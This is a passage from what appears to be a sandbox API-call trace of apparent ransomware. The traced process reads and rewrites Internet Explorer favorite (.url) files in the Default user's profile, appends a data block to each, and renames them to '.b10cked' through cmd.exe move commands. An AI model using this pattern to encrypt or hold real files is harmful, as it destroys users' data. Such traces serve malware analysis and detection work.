lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.428] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x998, dwThreadId=0xdec)) returned 1 [0213.438] CloseHandle (hObject=0x1b4) returned 1 [0213.438] CloseHandle (hObject=0x120) returned 1 [0213.439] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.439] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.439] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) 
returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.439] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27022870712) returned 1 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.441] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.442] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.442] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.443] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Work.url", lpUsedDefaultChar=0x0) returned 21 [0213.446] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.446] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.447] CloseHandle (hObject=0x120) returned 1 [0213.447] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL") returned 0x2f [0213.448] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.449] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x990, dwThreadId=0x958)) returned 1 [0213.453] CloseHandle (hObject=0x1b4) returned 1 [0213.453] CloseHandle (hObject=0x120) returned 1 [0213.453] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.453] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.453] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.453] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.453] ReleaseMutex (hMutex=0xf8) returned 1 [0213.453] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.453] ReleaseMutex (hMutex=0xf8) returned 1 [0213.453] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0213.454] ReleaseMutex (hMutex=0xf8) returned 1 [0213.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.454] ReleaseMutex (hMutex=0xf8) returned 1 [0213.454] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27024332478) returned 1 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 
| out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.456] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.456] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x42, lpOverlapped=0x0) returned 1 [0213.457] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.457] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x42, lpOverlapped=0x0) returned 1 [0213.457] SetFilePointer (in: hFile=0x120, lDistanceToMove=-66, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.458] ReadFile (in: hFile=0x120, 
lpBuffer=0x135adb8, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x42, lpOverlapped=0x0) returned 1 [0213.458] SetFilePointer (in: hFile=0x120, lDistanceToMove=-66, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.458] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x42, lpOverlapped=0x0) returned 1 [0213.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0213.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x1328794, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Store.url", lpUsedDefaultChar=0x0) returned 19 [0213.461] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x86 [0213.461] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.462] CloseHandle (hObject=0x120) returned 1 [0213.462] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL") returned 0x2f 